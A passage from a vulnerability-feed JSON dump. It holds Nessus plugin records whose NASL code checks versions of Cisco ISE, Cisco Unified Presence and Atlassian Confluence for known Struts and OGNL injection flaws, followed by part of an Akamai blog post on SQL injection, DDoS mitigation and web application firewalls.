exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' : '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:42:56", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED 531d8e919a578f5c402d55046279c6aa0319d64b11e6cfd1d400748c61e7c7ccaa711a8f2191f3390f64108dffec9cda1cfe6622e5965ce8740b74f709d83c9d97499c02c97b3848ad634219e609ff7acf98126943660349b42695aa34d768104c488c436c13e7667ce892766c7d106e37048ddcfba1ac2b772443e7a905b1e8a682e45817ad69bc684a2bce250dff79993839689a846ddc0e06ab184bbfc3958301fba47c2702e4bcc930e1eb90226c73a1a769e5c70c5b10a8341dac93b861d607f4713d05ce8f97544352f71f3a88dc9c2786a8e8747ac50f485c2b647276a41f88bb7c7cd340c7e3af67cd61a049cca011e3d9942ca32f0319c5fec33e651fb67d3d5f6f7859ea8414f333e21cac76fa1b4d3547ce78f376a0411eb50ef2dcbc163acce202bce2ef787f11028a173ada909c2b9bd82caddf4bb845e8159b4e4fb812ad4e8e6e24fad03496b0ac669c65e83433510c8b2b7915fa57f2f1f21d5866de373bf1fa4ecf5d5a50820a8f105b1744bd5693eda065b42bbb5486f28a0d2a94e6aa24fb12daafc9bf238b9c0add4691b0cbe3fe731b48a92d99ad9d4ffa22d31da79c776337c955cf2d58045aecf66c7250e7e147e1c6c36943213d6eea7c6c09437c8ec741e07e289ae48a2ec13c44a4b8ccf0d1b9824180479f8e787bdd465aa0346c61b3dcb6fe34ee45d7327e52b9c09a0dc5a05e7f4ed13b56\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:03:15", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:23", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0042\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:44", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/161808", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161808);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0227\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0023\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CVE-2022-26134)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'confluence';\n\nvar port = get_http_port(default:8090);\n\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:40:01", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CONFSERVER-79016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "href": "https://www.tenable.com/plugins/nessus/169509", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(169509);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/07\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0023\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CONFSERVER-79016)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79016\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_win_installed.nbin\", \"confluence_nix_installed.nbin\", \"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/Atlassian Confluence\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_name = 'Atlassian Confluence';\n\nvar app_info = vcf::combined_get_app_info(app:app_name);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {\"min_version\": \"1.3.0\", \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T14:56:37", "description": "The Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote this plugin currently only works against 7.14.x and below. This plugin is intended for testing LTS versions of Confluence.", "cvss3": {}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2022_26134.NBIN", "href": "https://www.tenable.com/plugins/nessus/162175", "sourceData": "Binary data confluence_cve_2022_26134.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2020-09-09T13:53:38", "description": "SQL injections were first discovered in 1998, and over 20 years later, they remain an unsolved challenge and an ongoing threat for every web application and API. The Open Web Application Security Project (OWASP) highlighted injection flaws in its Top 10 lists for both [web application security risks](<https://owasp.org/www-project-top-ten/>) and [API security threats](<https://owasp.org/www-project-api-security/>). \n\nFor Akamai customers, SQL injections comprised 76% of all web application attacks detected over the past two years.\n\nThe reasons why SQL injections remain a challenge in 2020 are the same as those that have driven the growth of the World Wide Web ([and Akamai with it](<https://www.streamingmediablog.com/2020/08/akamai-milestone.html>)) over the past two decades:\n\n * There is more information online than ever before, including [information that has financial value](<https://content.akamai.com/PG2564-Weighing-Risk-Against-Data-Breach.html>), and is therefore a target for attackers\n * The number of web applications is rapidly growing, and Akamai customers often have hundreds of applications that collectively represent their digital experience\n * Web applications have become highly complex, with many different components and technologies; the first-party and open source code in apps pose growing vulnerabilities, as do the many connections between services -- all of which can be exploited at any weak point\n * Developers don't always think about security, and security teams aren't able to keep up with the increasing number of complex applications they're chartered to protect\n\nAll of these factors contribute to security teams having difficulty keeping security up to date in constantly changing apps. But that's only half of the equation. Rapid iteration also creates a steady stream of possible new vulnerabilities and attack vectors designed to exploit them.\n\n### DDoS Protection Starts with Zero-Second Mitigation\n\nMost customers start their [web application and API protection (WAAP)](<https://www.gartner.com/en/documents/3903064/defining-cloud-web-application-and-api-protection-servic>) journey with distributed denial-of-service (DDoS) protection. After all, applications need to be available before there's any worry about a data breach.\n\n[![DDoSBlog1-thumb-700x505-10718.jpg](https://blogs.akamai.com/assets_c/2020/09/DDoSBlog1-thumb-700x505-10718-thumb-700x505-10952.jpg)](<https://blogs.akamai.com/DDoSBlog1-thumb-700x505-10718.jpg>)\n\nFrom [Operation Ababil](<https://www.akamai.com/us/en/about/news/press/2013-press/akamai-third-quarter-2012-state-of-the-internet-report.jsp>) to [Memcached](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/soti-summer-2018-web-attack-report.pdf?mkt_tok=eyJpIjoiTm1JeU56SmhaVEV5TkRWaSIsInQiOiI2MVlld2w4NHBSSHJ5SGFVU2I2Y3hLZkxyREFYaEdZdmpBSGh6TjVOVk40eG1CRlZRbFlNNWpKNUVQOU0wRGdhNnVOSW02SUVnSnNmUmZHM0VPRG5BMHNUNGV2bnFZbEhielNYTzFaRlwvQlQxMEFHNzQrWlhHc1hJVTVzbk55ZXgifQ%3D%3D>), the common thread between Akamai's DDoS mitigation services has always been instant mitigation for attacks, backed by an industry-leading zero-second time-to-mitigate service-level agreement (SLA). From the beginning, Akamai designed its CDN as a reverse HTTP/S proxy that instantly drops all network-layer attacks, which make up the vast majority of all DDoS attacks. \n\nLikewise, our authoritative DNS service drops all traffic that is not on port 53 in zero seconds. [Prolexic Routed](<https://www.akamai.com/us/en/products/security/prolexic-solutions.jsp>) introduced a similar capability in 2013, with [proactive mitigation controls](<https://www.akamai.com/us/en/multimedia/documents/white-paper/proactive-ddos-mitigation-with-prolexic-mitigation-controls-whitepaper.pdf>) tailored to each customer's network profile. Prolexic Routed was also responsible for mitigating the record-setting [1.3 Tbps Memcached attack in February 2018](<https://blogs.akamai.com/2018/03/memcached-fueled-13-tbps-attacks.html>) and [809 Mpps attack in June 2020](<https://blogs.akamai.com/2020/06/largest-ever-recorded-packet-per-secondbased-ddos-attack-mitigated-by-akamai.html>).\n\nThe ability to mitigate even the largest attacks in zero seconds is unique in the industry. Starting with proactive mitigation provides the fastest and most effective method for mitigating the majority of DDoS attacks -- without any additional analysis required. This is especially critical with the DDoS landscape of 2020, where short \"hit and run\" attacks and [large-scale attacks comprising multiple attack vectors](<https://blogs.akamai.com/security/index2.html>) are increasing in prevalence. \n\nBoth of these trends increase the challenges of analyzing attack behavior and applying appropriate mitigation controls quickly. Defining and dropping abnormal traffic upfront provides a better experience for customers and allows Akamai's Security Operations Command Center (SOCC) staff to focus on attacks that require manual analysis and mitigation.\n\n### Demand More from Your WAF\n\nWeb application attacks such as SQL injection pose very different challenges. How do you protect all of your web applications when a) you don't have enough application security staff or expertise and b) the applications themselves are constantly growing and changing? \n\nThe following principles have guided Akamai's web application firewall (WAF) development since 2009, when we introduced the industry's first edge WAF:\n\n * **Reduce the number of things that require management.** \nMoving to an edge-based deployment model allows you to manage your global WAF configuration with a single interface, instead of 